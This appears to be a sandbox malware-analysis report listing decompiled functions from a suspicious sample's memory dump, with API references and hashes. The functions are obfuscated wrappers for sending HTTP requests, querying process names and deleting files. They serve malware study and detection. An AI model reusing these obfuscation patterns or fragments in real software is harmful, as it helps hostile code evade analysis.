                                                                                                                                Function 00F4DAD9, Relevance: 1.5, APIs: 1, Instructions: 40networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 50%
                                                                                                                                			E00F4DAD9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, WCHAR* _a16, intOrPtr _a24, long _a28, void* _a32) {
				unsigned int _v8;
				signed int _v12;
				void* _t28;
				int _t33;

				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0xffffffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00F4BB26(_t28);
				_v12 = 0x69ca;
				_v12 = _v12 + 0xffff802c;
				_v12 = _v12 ^ 0xffff9515;
				_v8 = 0x39d2;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xcbb5;
				_v8 = _v8 ^ 0x0000aaa3;
				E00F5915E(0x13f, 0xdfd0d8a, 0x699633b1);
				_t33 = HttpSendRequestW(_a32, _a16, 0xffffffff, _a12, _a28); // executed
				return _t33;
			}







                                                                                                                                0x00f4dade
                                                                                                                                0x00f4dae1
                                                                                                                                0x00f4dae4
                                                                                                                                0x00f4dae7
                                                                                                                                0x00f4dae9
                                                                                                                                0x00f4daec
                                                                                                                                0x00f4daef
                                                                                                                                0x00f4daf2
                                                                                                                                0x00f4daf7
                                                                                                                                0x00f4dafc
                                                                                                                                0x00f4db06
                                                                                                                                0x00f4db12
                                                                                                                                0x00f4db19
                                                                                                                                0x00f4db20
                                                                                                                                0x00f4db24
                                                                                                                                0x00f4db28
                                                                                                                                0x00f4db2f
                                                                                                                                0x00f4db46
                                                                                                                                0x00f4db5c
                                                                                                                                0x00f4db61

                                                                                                                                APIs
                                                                                                                                • HttpSendRequestW.WININET(?,?,000000FF,?,?), ref: 00F4DB5C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: HttpRequestSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 360639707-0
                                                                                                                                • Opcode ID: 9ac3a5b75d77f5d8e601b179574ab365d901e5de0fc98aab35fc7be4905c97f5
                                                                                                                                • Instruction ID: 45dbd7d0db6256148e25d95acfdd61f70f7166b6e7a7342712dbc49854f9b810
                                                                                                                                • Opcode Fuzzy Hash: 9ac3a5b75d77f5d8e601b179574ab365d901e5de0fc98aab35fc7be4905c97f5
                                                                                                                                • Instruction Fuzzy Hash: 0A019372905209FBDF06CF94CD468DE7BB6EB48314F148298FA14222A0D7B6DA64EB51
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F47D00, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • QueryFullProcessImageNameW.KERNEL32(005EBC4F,00000000,0001DF7D,00000000,?,?,?,?,?,?,?,?,?), ref: 00F47D82
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FullImageNameProcessQuery
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3578328331-0
                                                                                                                                • Opcode ID: d82359bdbf85a5f9da5bbcf48d06fb0f4bebfec423bd04585118749198a83fad
                                                                                                                                • Instruction ID: 0adf7fe24e4fd1a4f95f34faedd7270d010e12a75cf274c15f601327a31ef4b6
                                                                                                                                • Opcode Fuzzy Hash: d82359bdbf85a5f9da5bbcf48d06fb0f4bebfec423bd04585118749198a83fad
                                                                                                                                • Instruction Fuzzy Hash: 7A01E97280120DFBDF15DF94CD09ACDBBB1FB04315F208098F915661A1D7BA5B64AB81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F4EC03, Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 76%
                                                                                                                                			E00F4EC03(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t18;
				int _t23;
				WCHAR* _t27;

				_push(_a8);
				_t27 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00F4BB26(_t18);
				_v16 = _v16 & 0x00000000;
				_v20 = 0x3d8b94;
				_v12 = 0xf7e4;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x00003af5;
				_v8 = 0xda3c;
				_v8 = _v8 ^ 0x668fce02;
				_v8 = _v8 ^ 0x668f1b8f;
				E00F5915E(0x219, 0x1db8a402, 0xf90a85c5);
				_t23 = DeleteFileW(_t27); // executed
				return _t23;
			}










                                                                                                                                0x00f4ec0a
                                                                                                                                0x00f4ec0d
                                                                                                                                0x00f4ec0f
                                                                                                                                0x00f4ec13
                                                                                                                                0x00f4ec14
                                                                                                                                0x00f4ec19
                                                                                                                                0x00f4ec20
                                                                                                                                0x00f4ec2c
                                                                                                                                0x00f4ec33
                                                                                                                                0x00f4ec37
                                                                                                                                0x00f4ec3e
                                                                                                                                0x00f4ec45
                                                                                                                                0x00f4ec4c
                                                                                                                                0x00f4ec63
                                                                                                                                0x00f4ec6c
                                                                                                                                0x00f4ec72

                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00004AF9), ref: 00F4EC6C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                • Opcode ID: dcd1d90f73fac76bf9b3a1e63dadbd328fb9e15a16341a6723b63b010a692415
                                                                                                                                • Instruction ID: 647580a5064252f6d96e90b062bf5ba0ab922c09da9332b0e56ee06726c35ea3
                                                                                                                                • Opcode Fuzzy Hash: dcd1d90f73fac76bf9b3a1e63dadbd328fb9e15a16341a6723b63b010a692415
                                                                                                                                • Instruction Fuzzy Hash: FCF049B5C05218FBDB05EFE4DC0A9EEBBB8EB01315F108099E80462241D7B55B199B82
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F42B19, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 71%
                                                                                                                                			E00F42B19(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t22;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00F4BB26(_t17);
				_v12 = 0xc7df;
				_v12 = _v12 ^ 0x73d98dc9;
				_v12 = _v12 ^ 0x73d97e92;
				_v8 = 0x972;
				_v8 = _v8 + 0xffff84fd;
				_v8 = _v8 ^ 0xffffc84b;
				E00F5915E(0xd2, 0x43dfce72, 0xf90a85c5);
				_t22 = FindCloseChangeNotification(_a12); // executed
				return _t22;
			}







                                                                                                                                0x00f42b1e
                                                                                                                                0x00f42b21
                                                                                                                                0x00f42b24
                                                                                                                                0x00f42b29
                                                                                                                                0x00f42b2e
                                                                                                                                0x00f42b38
                                                                                                                                0x00f42b44
                                                                                                                                0x00f42b4b
                                                                                                                                0x00f42b52
                                                                                                                                0x00f42b59
                                                                                                                                0x00f42b70
                                                                                                                                0x00f42b7b
                                                                                                                                0x00f42b80

                                                                                                                                APIs
                                                                                                                                • FindCloseChangeNotification.KERNEL32(?), ref: 00F42B7B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                • Opcode ID: 04e96b576e38e6b4094c033d3c5e6eaaf5abb4b8abcc3040c6a966b78a330fa9
                                                                                                                                • Instruction ID: 3105fde2762e2938c17c87b36110ee74499a2a96b0eb517f0f4fe30b93882215
                                                                                                                                • Opcode Fuzzy Hash: 04e96b576e38e6b4094c033d3c5e6eaaf5abb4b8abcc3040c6a966b78a330fa9
                                                                                                                                • Instruction Fuzzy Hash: F5F030B1814208FFEF04DFE4DC4699E7F74EB50300F108588F81566212E7759B20AB54
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                Function 00F4166C, Relevance: .0, Instructions: 2COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E00F4166C() {

				return  *[fs:0x30];
			}



                                                                                                                                0x00f41672

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%